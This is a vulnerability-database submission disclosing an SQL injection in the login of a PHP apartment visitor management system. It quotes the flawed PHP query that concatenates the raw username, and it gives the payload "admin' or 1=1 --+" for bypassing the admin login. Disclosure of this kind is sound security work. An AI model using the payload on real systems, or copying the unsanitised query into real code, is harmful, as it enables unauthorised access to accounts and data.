Submeter #43707: 公寓访客管理系统2.0存在sql注入漏洞 SQL injection vulnerability in apartment visitor management system 2.0informação

Título 公寓访客管理系统2.0存在sql注入漏洞 SQL injection vulnerability in apartment visitor management system 2.0
DescriçãoSQL injection vulnerability in apartment visitor management system 2.0 Vulnerability file location: / index.php look at this source code ``` if(isset($_POST['login'])) { $adminuser=$_ POST['username']; $password=md5($_POST['password']); $query=mysqli_ query($con,"SELECT ID from tbladmin where UserName='$adminuser' && Password='$password' "); ``` The username entered by the user is not checked. The input content is controlled by the user. The user directly logs in to the admin account with the universal password. statement is as follows ``` username=admin' or 1=1 --+ ``` https://s1.ax1x.com/2022/08/13/vtVTWd.png Source link https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code
Fonte⚠️ https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code/
Utilizador
 qidian (UID 30810)
Submissão13/08/2022 06h04 (há 4 anos)
Moderação13/08/2022 07h39 (2 hours later)
EstadoDuplicado
Entrada VulDB205665 [SourceCodester Apartment Visitor Management System 1.0 index.php Nome de utilizador Injeção SQL]
Pontos0

VoltarVisão GeralPróximo

Want to know what is going to be exploited?

We predict KEV entries!